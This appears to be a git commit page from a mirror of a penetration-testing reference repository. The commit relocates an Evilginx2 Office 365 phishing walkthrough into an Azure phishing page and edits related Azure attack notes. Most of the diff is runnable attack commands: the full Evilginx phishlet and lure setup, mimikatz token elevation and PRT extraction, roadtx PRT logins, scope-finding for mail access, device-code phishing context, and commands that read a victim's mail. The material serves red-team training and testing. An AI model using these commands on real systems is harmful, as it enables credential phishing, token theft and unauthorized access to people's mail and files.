swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Evilginx Phishlet

pull/1/head
Swissky 2023-11-21 23:34:26 +01:00
parent 23b16ca0de
commit 4947154dc7
5 changed files with 42 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
docs/cloud/azure/Cloud - Azure Pentest.md
View File

@ -16,7 +16,6 @@
* [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli) * [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli)
* [Enumerate manually](#enumerate-manually) * [Enumerate manually](#enumerate-manually)
* [Enumeration methodology](#enumeration-methodology) * [Enumeration methodology](#enumeration-methodology)
* [Phishing with Evilginx2](#phishing-with-evilginx2)
* [Token from Managed Identity](#token-from-managed-identity) * [Token from Managed Identity](#token-from-managed-identity)
* [Azure API via Powershell](#azure-api-via-powershell) * [Azure API via Powershell](#azure-api-via-powershell)
* [Azure API via Python Version](#azure-api-via-python-version) * [Azure API via Python Version](#azure-api-via-python-version)
@ -439,28 +438,6 @@ PS Az> Get-AzStorageAccount | fl
PS Az> Get-AzKeyVault PS Az> Get-AzKeyVault
``` ```
## Phishing with Evilginx2
```powershell
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
: config domain username.corp
: config ip 10.10.10.10
: phishlets hostname o365 login.username.corp
: phishlets get-hosts o365
Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine
# copy certificate and enable the phishing
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
: phishlets enable o365
# get the phishing URL
: lures create o365
: lures get-url 0
```
## Token from Managed Identity ## Token from Managed Identity

6
docs/cloud/azure/azure-access-and-token.md
View File

@ -91,13 +91,15 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9
* Use PRT token * Use PRT token
```ps1 ```ps1
roadtx browserprtauth -prt roadtx.prt -url http://www.office.com roadtx browserprtauth --prt <prt-token> --prt-sessionkey <session-key>
roadtx browserprtauth --prt roadtx.prt -url http://www.office.com
``` ```
### Extract PRT v1 ### Extract PRT v1
```ps1 ```ps1
mimikatz # token::elevate
mimikatz # sekurlsa::cloudap mimikatz # sekurlsa::cloudap
mimikatz # sekurlsa::dpapi mimikatz # sekurlsa::dpapi
mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
@ -110,7 +112,7 @@ roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url
* No method known to date. * No method known to date.
### Generate a PRT by registering a device ### Upgrade Refresh Token to PRT
```ps1 ```ps1
# Get correct token audience # Get correct token audience

11
docs/cloud/azure/azure-devices-users-services.md
View File

@ -46,3 +46,14 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
# Service Principals # Service Principals
# Other
Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
```ps1
roadtx getscope -s https://graph.microsoft.com/mail.read
roadtx findscope -s https://graph.microsoft.com/mail.read
```

23
docs/cloud/azure/azure-phishing.md
View File

@ -98,3 +98,26 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
* Leave TokenTactics running in the PowerShell window and send the phishing email * Leave TokenTactics running in the PowerShell window and send the phishing email
* Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form * Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form
* Enjoy your **access token** and **refresh token** * Enjoy your **access token** and **refresh token**
## Phishing with Evilginx2
* Run `evilginx2` with o365 phishlet
```powershell
PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
: config domain username.corp
: config ip 10.10.10.10
: phishlets hostname o365 login.username.corp
: phishlets get-hosts o365
```
* Create a DNS entry type A for `login.login.username.corp` and `www.login.username.corp`, pointing to your machine
* Copy certificate and enable the phishing
```ps1
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
: phishlets enable o365
# get the phishing URL
: lures create o365
: lures get-url 0
```

4
docs/cloud/azure/azure-services.md
View File

@ -50,7 +50,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
``` ```
## Outlook Mails ### Outlook Mails
* Read user mails * Read user mails
```ps1 ```ps1
@ -58,7 +58,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id> Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
``` ```
## OneDrive Files ### OneDrive Files
```ps1 ```ps1
$userId = "<user-id>" $userId = "<user-id>"